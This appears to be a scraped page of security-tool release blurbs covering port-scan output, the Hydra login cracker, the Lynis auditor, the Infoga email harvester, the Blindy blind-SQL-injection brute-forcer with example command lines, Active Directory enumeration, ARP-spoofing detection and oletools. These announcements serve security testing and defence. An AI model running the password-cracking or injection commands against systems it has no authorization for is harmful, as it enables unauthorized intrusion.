Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.05 second
----------------------------

------- ipfingerprints -------
Host is up (0.16s latency).
Not shown: 484 closed ports
PORT    STATE    SERVICE
22/tcp  open     ssh
80/tcp  open     http
111/tcp filtered rpcbind
135/tcp filtered msrpc
136/tcp filtered profile
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14
Network Distance: 10 hops
------------------------------

------- pingeu -------
PORT     STATE  SERVICE
21/tcp   closed ftp
22/tcp   open   ssh
23/tcp   closed telnet
25/tcp   closed smtp
53/tcp   closed dns
80/tcp   open   http
139/tcp  closed netbios
443/tcp  closed https
445/tcp  closed smb
3389/tcp closed rdp
----------------------

Download scanless

Read More

Hydra 8.5 - Network Logon Cracker

 A very fast network logon cracker which support many different services.

See feature sets and services coverage page - incl. a speed comparison against ncrack and medusa.Number one of the biggest security holes are passwords, as every password security study shows.

This tool is a proof of concept code, to give researchers and security consultants the possiblity to show how easy it would be to gain unauthorized access from remote to a system.

There are already several login hacker tools available, however none does either support more than one protocol to attack or support parallized connects.

It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and OSX.

Currently this tool supports the following protocols:

Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

CHANGELOG for 8.5

CHANGELOG for 8.5
        ===================
        ! Development moved to a public github repository: https://github.com/vanhauser-thc/thc-hydra
        
        ! Reports came in that the rdp module is not working reliable sometimes, most likely against new Windows versions. please test, report and if possible send a fix
        * New command line option:
          -b : format option for -o output file (json only so far, happy for patches supporting others :) ) - thanks to veggiespam for the patch
        * ./configure now honors the CC enviroment variable if present
        * Fix for the restore file crash on some x64 platforms (finally! thanks to lukas227!)
        * Changed the format of the restore file to detect cross platform copies
        * Fixed a bug in the NCP module
        * Favor strrchr() over rindex()
        * Added refactoring patch by diadlo
        * Updated man page with missing command line options

Download THC-Hydra 8.3

Read More

Lynis 2.5.0 - Security Auditing Tool for Unix/Linux Systems

We are excited to announce this major release of auditing tool Lynis. Several big changes have been made to core functions of Lynis. These changes are the next of simplification improvements we made. There is a risk of breaking your existing configuration.

Lynis is an open source security auditing tool. Used by system administrators, security professionals, and auditors, to evaluate the security defenses of their Linux and UNIX-based systems. It runs on the host itself, so it performs more extensive security scans than vulnerability scanners.

Supported operating systems

The tool has almost no dependencies, therefore it runs on almost all Unix based systems and versions, including:

• AIX
• FreeBSD
• HP-UX
• Linux
• Mac OS
• NetBSD
• OpenBSD
• Solaris
• and others

It even runs on systems like the Raspberry Pi and several storage devices!

Installation optional

Lynis is light-weight and easy to use. Installation is optional: just copy it to a system, and use "./lynis audit system" to start the security scan. It is written in shell script and released as open source software (GPL). 

How it works

Lynis performs hundreds of individual tests, to determine the security state of the system. The security scan itself consists of performing a set of steps, from initialization the program, up to the report.

Steps

1. Determine operating system
2. Search for available tools and utilities
3. Check for Lynis update
4. Run tests from enabled plugins
5. Run security tests per category
6. Report status of security scan

Besides the data displayed on screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file.

Opportunistic scanning

Lynis scanning is opportunistic: it uses what it can find.

For example if it sees you are running Apache, it will perform an initial round of Apache related tests. When during the Apache scan it also discovers a SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it then will collect discovered certificates, so they can be scanned later as well.

In-depth security scans

By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!

Use cases

Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:

• Security auditing
• Compliance testing (e.g. PCI, HIPAA, SOx)
• Vulnerability detection and scanning
• System hardening

Resources used for testing

Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.

• Best practices
• CIS
• NIST
• NSA
• OpenSCAP data
• Vendor guides and recommendations (e.g. Debian Gentoo, Red Hat)

Lynis Plugins

lugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to some standard.

Changelog

Upgrade note

During the development of this release, the project got informed about a flaw
that possibly could be abused by a local attacker. Even with the small risk of
success, upgrading is highly recommended. See details on
[CVE-2017-8108](https://cisofy.com/security/cve/cve-2017-8108/)

This release is a special maintenance release with focus on cleaning up the code
for readability and future expansion.

Changes:
--------
* Use ROOTDIR variable instead of fixed paths
* Introduction of IsEmpty and HasData functions for readability of code
* Renamed some variables to better indicate their purpose (counting, data type)
* Removal of unused code and comments
* Deleted unused tests from database file
* Correct levels of identation
* Support for older mac OS X versions (Lion and Mountain Lion)
* Initialized variables for more binaries
* Additional sysctls are tested

Tests:
------
* MALW-3280 - Extended test with Symantec components
* PKGS-7332 - Detection of macOS ports tool and installed packages
* TOOL-5120 - Snort detection
* TOOL-5122 - Snort configuration file

Download Lynis 2.5.0

Read More

Infoga v3.0 - Email Information Gathering

Infoga is a tool for gathering e-mail accounts information from different public sources (search engines, pgp key servers). Is a really simple tool, but very effective for the early stages of a penetration test or just to know the visibility of your company in the Internet.

Installation

git clone https://github.com/m4ll0k/Infoga.git
cd Infoga
pip install -r requires.txt
python infoga.py

ScreenShots

Download Infoga

Read More

Blindy - Simple Script for running BruteForce Blind MySql Injection

Simple script for running bruteforce blind MySql injection

The script will run through queries listed in sets in provided file (default-queries.json as default) and try to bruteforce places with {} placeholder. If no {} placeholder present, the script will simply make request with current query.

command line

$ python3 blindy.py --help
usage: blindy.py [-h] [-f filename] [-m method] -p name -r regexp -u url
                 [-s set_of_queries]

Run blind sql injection using brutforce

optional arguments:
  -h, --help            show this help message and exit
  -f filename           File name for your commands in json format, defaults
                        to default-queries.json
  -m method, --method method
                        Where to inject (GET - get parameter/default, POST -
                        post parameter, HEADER - header)
  -p name               Name of parameter (for get - param name, post - param
                        name, for header - name of header). If params need to
                        have fixed value use -p submit=true
  -r regexp             Regular expression for negative pattern (script search
                        for the pattern and if present - will consider that
                        injection failed and igrone result.)
  -u url                Url to test
  -s set_of_queries, --set set_of_queries
                        Which set of queries to analyze from json file, for
                        ex. login, blind. Default to blind.

Example usage
Bruteforce inject into POST query_param

python3 blindy.py -m POST -p query_param -p submit=1 -r 'Pattern\ to\ ignore\ result' -u http://example.com/index.php -s blind

Bruteforce inject into POST query_param with placeholder

python3 blindy.py -m POST -p "query_param=login {}" -p submit=1 -r 'Pattern\ to\ ignore\ result' -u http://example.com/index.php -s blind

This will inject the queries in a place of {} parameter placeholder
Simple check a list of queries against username parameter

python3 blindy.py -m POST -p username -p submit=1 -r 'Pattern\ to\ ignore\ result' -u http://example.com/login.php -s login

Download Blindy

Read More

Truehunter - Tool to detect TrueCrypt containers

The goal of Truehunter is to detect TrueCrypt containers using a fast and memory efficient approach. It was designed as a PoC some time ago as I couldn't find any open source tool with the same functionality.

Installation
Just use with Python 2.7, it does not need any additional libraries.

usage: truehunter.py [-h] [-D HEADERSFILE] [-m MINSIZE] [-M MAXSIZE]
[-R MAXHEADER] [-f] [-o OUTPUTFILE]
LOCATION
Checks for file size, unknown header, and entropy of files to determine if
they are encrypted containers.
positional arguments:
LOCATION Drive or directory to scan.
optional arguments:
-h, --help show this help message and exit.
-D HEADERSFILE, --database HEADERSFILE
Headers database file, default headers.db
-m MINSIZE, --minsize MINSIZE
Minimum file size in Kb, default 1Mb.
-M MAXSIZE, --maxsize MAXSIZE
Maximum file size in Kb, default 100Mb.
-R MAXHEADER, --repeatHeader MAXHEADER
Discard files with unknown headers repeated more than
N times, default 3.
-f, --fast Do not calculate entropy.
-o OUTPUTFILE, --outputfile OUTPUTFILE
Scan results file name, default scan_results.csv

Download Truehunter

Read More

Ad-LDAP-Enum - Active Directory LDAP Enumerator

ad-ldap-enum is a Python script that was developed to discover users and their group memberships from Active Directory. In large Active Directory environments, tools such as NBTEnum were not performing fast enough. By executing LDAP queries against a domain controller, ad-ldap-enum is able to target specific Active Directory attributes and build out group membership quickly.

ad-ldap-enum outputs three tab delimited files 'Domain Group Membership.tsv', 'Extended Domain User Information.tsv', and 'Extended Domain Computer Information.tsv'. The first file contains users, computers, groups, and their memberships. The second file contains users and extra information about the users from Active Directory (e.g. a user's home folder or email address). The third file contains devices in the Domain Computers group and extra information about them from Active Directory (e.g. operating system type and service pack version).

ad-ldap-enum supports both authenticated and unauthenticated LDAP connections. Additionally, ad-ldap-enum can process nested groups and display a user's actual group membership.

Requirements
The package python-ldap is required for the script to execute. This can be installed with the following command:

pip install python-ldap

Usage

ad-ldap-enum.py [-h] -l LDAP_SERVER -d DOMAIN [-a ALT_DOMAIN] [-e] [-n] [-u USERNAME] [-p PASSWORD] [-v]

Active Directory LDAP Enumerator

optional arguments:
  -h, --help                                        show this help message and exit
  -v, --verbose                                     Display debugging information.
  -o FILENAME_PREPEND, --prepend FILENAME_PREPEND   Prepend a string to all output file names.

Server Parameters:
  -l LDAP_SERVER, --server LDAP_SERVER              IP address of the LDAP server.
  -d DOMAIN, --domain DOMAIN                        Authentication account's FQDN. If an alternative domain is not specified this will be also used as the Base DN for searching LDAP.
  -a ALT_DOMAIN, --alt-domain ALT_DOMAIN            Alternative FQDN to use as the Base DN for searching LDAP.
  -e, --nested                                      Expand nested groups.

Authentication Parameters:
  -n, --null                                        Use a null binding to authenticate to LDAP.
  -u USERNAME, --username USERNAME                  Authentication account's username.
  -p PASSWORD, --password PASSWORD                  Authentication account's password.

Example
python ad-ldap-enum.py -d contoso.com -l 10.0.0.1 -u Administrator -p P@ssw0rd

Assorted Links

• Membership Ranges in Active Directory
• Active Directory Paging

Download Ad-LDAP-Enum

Read More

shARP - anti-ARP-spoofing application software and uses active scanning method to detect any ARP-spoofing incidents

ARP spoofing allows an attacker to intercept data frames on a network, modify the traffic, or stop all traffic. Often the attack is used as an opening for other attacks, such as denial of service, man in the middle, or session hijacking attacks.Our anti- ARP spoofing program, (shARP) detects the presence of a third party in a private network actively. It has 2 mode: defensive and offensive. Defensive mode protects the end user from the spoofer by dissconnecting the user's system from the network and alerts the user by an audio message. The offensive mode dissconnects the user's system from the network and further kicks out the attacker by sending de-authentication packets to his system, unabling him to reconnect to the network until the program is manually reset. The program creates a log file (/usr/shARP/)containing the details of the attack such as, the attackers mac address, mac vendor time and date of the attack. We can identify the NIC of the attackers system with the help of the obtained mac address. If required the attacker can be permanently banned from the netwrk by feeding his mac address to the block list of the router. The whole program is designed specially for linux and is writen in Linux s is hell command (bash command). In the offensive mode the program downloads an open-source application from the internet with the permission of the user namely aircrack-ng (if not present in the user's system already ). Since it is written in python language, you must have python installed on your system for it to work. Visit https://www.aircrack-ng.org for more info.

If the user wants to secure his network by scanning for any attacker he can run the program. the program offers a simple command line interface which makes it easy for the new users.the user can directly access the defensive or offensive mode by inputing the respective command line arguments along with the execution code just as in any other linux command to operate a software through CLI. In case the user inputs any wrong command line argument, the program prompts the user to use the help option. the help option provides the details about the two modes. when the user runs the program in defensive mode, he recieves the original mac address of the gateway. If there is no man in the middle attack, the screen stays idle. As soon as the program detects a spoofer in the network, it outputs the mac address of the spoofer and the time of the attack. It then dissconnects the users's system from the network so as to protect the private data being transfered between the system and the server. It also saves a log file about the attacker for further use. when the user runs the program in offensive mode,he recieves the original mac address of the gateway. If there is no man in the middle attack, the screen stays idle. As soon as the program detects a spoofer in the network, it outputs the mac address of the spoofer and the time of the attack as in the defensive mode. But further, the program puts the user's Network Interface Card to monitor mode with the help of the application 'Airmon-ng'. Then the application 'Aircrack-ng' gets activated and starts sending deauthentication packets to the attacker's system. This process kicks out the attacker from the network. The program also creates a log file about the attack.

How to use

bash ./shARP.sh -r [interface] to reset the network card and driver.  
bash ./shARP.sh -d [interface] to activate the program in defense mode.  
bash ./shARP.sh -o [interface] to activate the program in offense mode.  
bash ./shARP.sh -h             for help.

Download shARP

Read More

oletools - Tools to analyze MS OLE2 files and MS Office documents, for malware analysis, forensics and debugging

oletools is a package of python tools to analyze Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging. It is based on the olefile parser. See http://www.decalage.info/python/oletools for more info.

News

• 2016-11-01 v0.50: all oletools now support python 2 and 3.
  • olevba: several bugfixes and improvements.
  • mraptor: improved detection, added mraptor_milter for Sendmail/Postfix integration.
  • rtfobj: brand new RTF parser, obfuscation-aware, improved display, detect executable files in OLE Package objects.
  • setup: now creates handy command-line scripts to run oletools from any directory.
• 2016-06-10 v0.47: olevba added PPT97 macros support, improved handling of malformed/incomplete documents, improved error handling and JSON output, now returns an exit code based on analysis results, new --relaxed option. rtfobj: improved parsing to handle obfuscated RTF documents, added -d option to set output dir. Moved repository and documentation to GitHub.
• 2016-04-19 v0.46: olevba does not deobfuscate VBA expressions by default (much faster), new option --deobf to enable it. Fixed color display bug on Windows for several tools.
• 2016-04-12 v0.45: improved rtfobj to handle several anti-analysis tricks, improved olevba to export results in JSON format.

See the full changelog for more information.

Tools:

• olebrowse: A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams.
• oleid: to analyze OLE files to detect specific characteristics usually found in malicious files.
• olemeta: to extract all standard properties (metadata) from OLE files.
• oletimes: to extract creation and modification timestamps of all streams and storages.
• oledir: to display all the directory entries of an OLE file, including free and orphaned entries.
• olemap: to display a map of all the sectors in an OLE file.
• olevba: to extract and analyze VBA Macro source code from MS Office documents (OLE and OpenXML).
• MacroRaptor: to detect malicious VBA Macros
• pyxswf: to detect, extract and analyze Flash objects (SWF) that may be embedded in files such as MS Office documents (e.g. Word, Excel) and RTF, which is especially useful for malware analysis.
• oleobj: to extract embedded objects from OLE files.
• rtfobj: to extract embedded objects from RTF files.
• and a few others (coming soon)

Projects using oletools:

oletools are used by a number of projects and online malware analysis services, including Viper, REMnux, FAME, Hybrid-analysis.com, Joe Sandbox, Deepviz, Laika BOSS, Cuckoo Sandbox, Anlyz.io, ViperMonkey, pcodedmp, dridex.malwareconfig.com, and probably VirusTotal. (Please contact me if you have or know a project using oletools)

Download and Install:
The recommended way to download and install/update the latest stable release of oletools is to use pip:

• On Linux/Mac: sudo -H pip install -U oletools
• On Windows: pip install -U oletools

This should automatically create command-line scripts to run each tool from any directory: olevba, mraptor, rtfobj, etc.
To get the latest development version instead:

• On Linux/Mac: sudo -H pip install -U https://github.com/decalage2/oletools/archive/master.zip
• On Windows: pip install -U https://github.com/decalage2/oletools/archive/master.zip

See the documentation for other installation options.

Documentation:
The latest version of the documentation can be found online, otherwise a copy is provided in the doc subfolder of the package.

Download oletools

Read More

Lynis 2.4.7 - Security Auditing Tool for Unix/Linux Systems

We are excited to announce this major release of auditing tool Lynis. Several big changes have been made to core functions of Lynis. These changes are the next of simplification improvements we made. There is a risk of breaking your existing configuration.

Lynis is an open source security auditing tool. Used by system administrators, security professionals, and auditors, to evaluate the security defenses of their Linux and UNIX-based systems. It runs on the host itself, so it performs more extensive security scans than vulnerability scanners.

Supported operating systems

The tool has almost no dependencies, therefore it runs on almost all Unix based systems and versions, including:

• AIX
• FreeBSD
• HP-UX
• Linux
• Mac OS
• NetBSD
• OpenBSD
• Solaris
• and others

It even runs on systems like the Raspberry Pi and several storage devices!

Installation optional

Lynis is light-weight and easy to use. Installation is optional: just copy it to a system, and use "./lynis audit system" to start the security scan. It is written in shell script and released as open source software (GPL). 

How it works

Lynis performs hundreds of individual tests, to determine the security state of the system. The security scan itself consists of performing a set of steps, from initialization the program, up to the report.

Steps

1. Determine operating system
2. Search for available tools and utilities
3. Check for Lynis update
4. Run tests from enabled plugins
5. Run security tests per category
6. Report status of security scan

Besides the data displayed on screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file.

Opportunistic scanning

Lynis scanning is opportunistic: it uses what it can find.

For example if it sees you are running Apache, it will perform an initial round of Apache related tests. When during the Apache scan it also discovers a SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it then will collect discovered certificates, so they can be scanned later as well.

In-depth security scans

By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!

Use cases

Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:

• Security auditing
• Compliance testing (e.g. PCI, HIPAA, SOx)
• Vulnerability detection and scanning
• System hardening

Resources used for testing

Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.

• Best practices
• CIS
• NIST
• NSA
• OpenSCAP data
• Vendor guides and recommendations (e.g. Debian Gentoo, Red Hat)

Lynis Plugins

lugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to some standard.

Changelog

Upgrade note

Lynis 2.4.7 (2017-03-22)

Changes:
* Minor code cleanups

Tests:
------
* BANN-7126 - Added more words to test for
* CUPS-2308 - Improve logging for CUPS configuration test, removed exception handler
* HTTP-6641 - Support detection for Apache module mod_reqtimeout
* PKGS-7388 - Minor change to detect security repositories

Download Lynis 2.4.7

Read More